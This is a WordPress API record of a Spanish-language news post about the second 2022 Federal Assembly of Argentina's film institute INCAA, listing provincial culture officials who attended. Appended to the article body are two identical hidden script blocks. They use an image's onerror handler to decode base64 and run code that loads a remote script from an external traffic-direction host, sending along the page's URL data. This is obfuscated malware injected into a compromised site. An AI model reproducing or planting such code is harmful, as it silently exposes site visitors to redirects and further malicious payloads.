{"id":1786,"date":"2022-11-14T09:58:28","date_gmt":"2022-11-14T12:58:28","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=1786"},"modified":"2025-08-14T00:30:21","modified_gmt":"2025-08-14T03:30:21","slug":"se-realizo-la-iio-asamblea-federal-del-incaa-en-2022","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=1786","title":{"rendered":"Se realiz\u00f3 la II\u00ba Asamblea Federal del INCAA en 2022"},"content":{"rendered":"\n<h4 class=\"has-cyan-bluish-gray-color has-text-color has-background wp-block-heading\" style=\"background-color:#654c05\"><em>Durante la novena jornada del Festival Internacional de Cine de Mar del Plata, se reuni\u00f3 la Asamblea Federal Ordinaria del Instituto Nacional de Cine y Artes Audiovisuales (INCAA), en su segunda sesi\u00f3n en 2022.<\/em><\/h4>\n\n\n\n<p>En el marco de la novena jornada del Festival Internacional de Cine de Mar del Plata, se reuni\u00f3 la Asamblea Federal Ordinaria del Instituto Nacional de Cine y Artes Audiovisuales (INCAA), en su segunda sesi\u00f3n en 2022.<\/p>\n\n\n\n<p>La reuni\u00f3n fue encabezada por el vicepresidente en ejercicio de la Presidencia del INCAA,&nbsp;<strong>Nicol\u00e1s Batlle<\/strong>&nbsp;y estuvo integrada por el director de Audiovisuales de la Provincia,<strong>&nbsp;Federico Casoni<\/strong>, junto a responsables de Cultura de las dem\u00e1s provincias y del Gobierno de la Ciudad Aut\u00f3noma de Buenos Aires.<\/p>\n\n\n\n<p>Batlle dio la bienvenida a los asamble\u00edstas y destac\u00f3 la gran concurrencia y el compromiso de las provincias en este encuentro hist\u00f3rico, el primero presencial en tres a\u00f1os. Aprovech\u00f3 la ocasi\u00f3n para agradecer el apoyo al Instituto por parte de los secretarios y ministros de Cultura provinciales durante estos \u00faltimos siete meses de gesti\u00f3n y al Consejo Asesor que, en el transcurso del a\u00f1o, se reuni\u00f3 en las diferentes sedes de la Escuela Nacional de Experimentaci\u00f3n y Realizaci\u00f3n Cinematogr\u00e1fica (ENERC) para trabajar pol\u00edticas de federalizaci\u00f3n.<\/p>\n\n\n\n<p>\u201cNo quiero dejar de mencionar la obtenci\u00f3n de la pr\u00f3rroga por cincuenta a\u00f1os de las asignaciones espec\u00edficas para el financiamiento de la industria e instituciones culturales que se obtuvo gracias a la sanci\u00f3n de la ley en el Senado; eso fue posible gracias al ejercicio de la pol\u00edtica y la responsabilidad de todas las autoridades\u201d, dijo Nicol\u00e1s Batlle. Y agreg\u00f3: \u201cpor cincuenta a\u00f1os m\u00e1s, tendremos una cultura libre, justa y soberana. En este sentido, les propongo que el a\u00f1o pr\u00f3ximo trabajemos con el mismo empe\u00f1o con el que nos comprometimos con este tema para repensar pol\u00edticas que puedan expandir los fondos para el fomento\u201d.<\/p>\n\n\n\n<p>Durante la reuni\u00f3n se present\u00f3 un informe de gesti\u00f3n del corriente a\u00f1o y un plan estrat\u00e9gico para 2023; en ese sentido los responsables de las diferentes \u00e1reas del INCAA presentaron un repaso de lo actuado y un estado de situaci\u00f3n al cierre del a\u00f1o.<\/p>\n\n\n\n<p>Se abordaron temas relativos al Plan de fomento, el costo medio para las pel\u00edculas de producci\u00f3n nacional y las convocatorias a concursos para el pr\u00f3ximo a\u00f1o. Adem\u00e1s, se convers\u00f3 sobre el avance del proyecto de la Cinemateca Nacional INCAA, la situaci\u00f3n de las sedes regionales de la ENERC \u2013y las sedes con especializaci\u00f3n en Animaci\u00f3n 3D y Tecnolog\u00edas Digitales que se incorporaron recientemente\u2013, la Red de Espacios INCAA, la plataforma CINE.AR PLAY y el canal CINE.AR TV. La agenda tambi\u00e9n incluy\u00f3 otras cuestiones vinculadas a las pol\u00edticas de desarrollo federal, como el apoyo a las provincias a trav\u00e9s de los festivales nacionales y el desarrollo del programa Cine M\u00f3vil.<\/p>\n\n\n\n<p>La Asamblea Federal se desarroll\u00f3 en un marco de di\u00e1logo constructivo, fundamental para concretar un INCAA inclusivo y de car\u00e1cter federal.<\/p>\n\n\n\n<p>Participaron el vicepresidente del Instituto Cultural de la Provincia de Buenos Aires, Gianni Buono; la coordinadora de Espacios INCAA de Catamarca, Lidia Coria; el presidente del Instituto de Cultura del Chaco, Neri Francisco Enrique Romero; la representante por la Secretar\u00eda de Ciencia, Tecnolog\u00eda, Innovaci\u00f3n Productiva y Cultura de Chubut, Vanesa Zadoff; la gerenta del programa BA Audiovisual del Ministerio de Cultura de la Ciudad Aut\u00f3noma de Buenos Aires, Paula Zupnik; el director del Polo Audiovisual C\u00f3rdoba, Jorge \u00c1lvarez; el presidente del Instituto Audiovisual de la Provincia de Entre R\u00edos, Germ\u00e1n Andr\u00e9s G\u00f3mez; el subsecretario de Cultura de la Provincia de Formosa, Jorge Santander; el secretario de Cultura de la Provincia de Jujuy, Luis Medina Zar; la secretaria de Cultura de la Provincia de La Pampa, Adriana Lis Maggio; la directora General de Cine del Ministerio de Turismo y Culturas de La Rioja, Hebe Estrabou; la coordinadora del \u00c1rea Audiovisual del Ministerio de Cultura y Turismo de Mendoza, Carolina Peralta; el presidente del Instituto de Artes Audiovisuales de Misiones, Mario Gim\u00e9nez; el director provincial de Fomento de la Industria del Cine de la Provincia de Neuqu\u00e9n, Mart\u00edn Ferrari; el director del Polo Audiovisual de la Secretar\u00eda de Estado de Cultura de R\u00edo Negro, Cristian Calvo; el director de Audiovisuales de la Secretar\u00eda de Cultura de la Provincia de Salta, Federico Casoni; el coordinador audiovisual del Ministerio de Turismo y Cultura de la Provincia de San Juan, Daniel Gil; el jefe del Subprograma Industria del Cine del Ministerio de Ciencia y Tecnolog\u00eda de la Provincia de San Luis, Juan Manuel Venner; la secretaria de Pol\u00edtica e Innovaci\u00f3n Sociocultural del Ministerio de Cultura de la Provincia de Santa Fe, Florencia Lattuada; la secretaria de Cultura de Tierra del Fuego, Ant\u00e1rtida e Islas del Atl\u00e1ntico Sur, Luc\u00eda Rossi y la directora de Medios Audiovisuales del Ente Cultural de Tucum\u00e1n, Adriana Chaya.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:\u00a0<strong><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/se-realizo-la-ii-asamblea-federal-del-incaa-en-2022-86147\" target=\"_blank\" rel=\"noopener\">Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/a><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Durante la novena jornada del Festival Internacional de Cine de Mar del Plata, se reuni\u00f3 la Asamblea Federal Ordinaria del Instituto Nacional de Cine y Artes Audiovisuales (INCAA), en su segunda sesi\u00f3n en 2022. En el marco de la novena jornada del Festival Internacional de Cine de Mar del Plata, se reuni\u00f3 la Asamblea Federal [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":1787,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[14,23,10],"tags":[],"class_list":{"0":"post-1786","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-anuncios","8":"category-audio-visuales","9":"category-colaboradores"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1786"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1786"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1786\/revisions"}],"predecessor-version":[{"id":7277,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1786\/revisions\/7277"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/1787"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1786"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1786"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1786"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}